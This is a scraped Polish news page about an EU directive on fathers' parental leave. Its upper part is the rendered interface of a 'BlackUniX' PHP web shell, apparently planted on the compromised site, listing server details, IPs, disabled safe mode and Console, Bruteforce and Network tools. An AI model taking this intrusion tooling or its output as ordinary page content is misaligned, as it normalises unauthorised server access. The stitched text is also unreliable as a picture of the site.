Aktualności w serwisie wstroneojca.pl


BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-23 11:48:22
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.104.202
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

przymusowy urlop dla ojców
Lobbing
Dyrektywa Unii Europejskiej ma sprawić, by ojcowie bardziej angażowali się w opiekę nad dziećmi, zastępując na urlopach kobiety. W przewidywanym czteromiesięcznym urlopie jeden miesiąc zostanie przypisany ojcu. Nie będzie mógł go przekazać matce, bo przepadnie. Bruksela chce także, by rodzice w czasie tego minimalnego czteromiesięcznego urlopu wychowawczego otrzymywali specjalne świadczenie.